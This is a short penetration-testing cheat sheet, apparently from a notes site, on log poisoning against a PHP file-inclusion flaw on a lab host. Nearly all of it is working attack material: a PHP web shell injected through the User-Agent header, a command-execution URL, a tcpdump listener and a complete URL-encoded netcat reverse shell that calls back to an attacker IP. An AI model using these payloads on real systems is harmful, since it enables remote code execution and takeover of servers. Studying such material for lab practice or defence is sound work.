Log Poisoning

User-Agent poisoning:

  • allow_url_fopen needs to be On

  • If the access_log is exposed and the server is not properly sanitizing or validating the User-Agent: 

User-Agent: tokyo: <?php system($_GET['cmd']); ?>

  • From here, just visit the URL

http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=id

  • Use ping to check if it's possible to generate outbound network traffic back to the host:

http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=ping 10.10.16.8

  • Catch it with tcpmdump

tcpdump -i tun0 icmp

  • Get a reverse shell:

http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&c=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.16.8%204444%20%3E/tmp/f

PreviousDeserializationNextArbitrary Command Execution

Last updated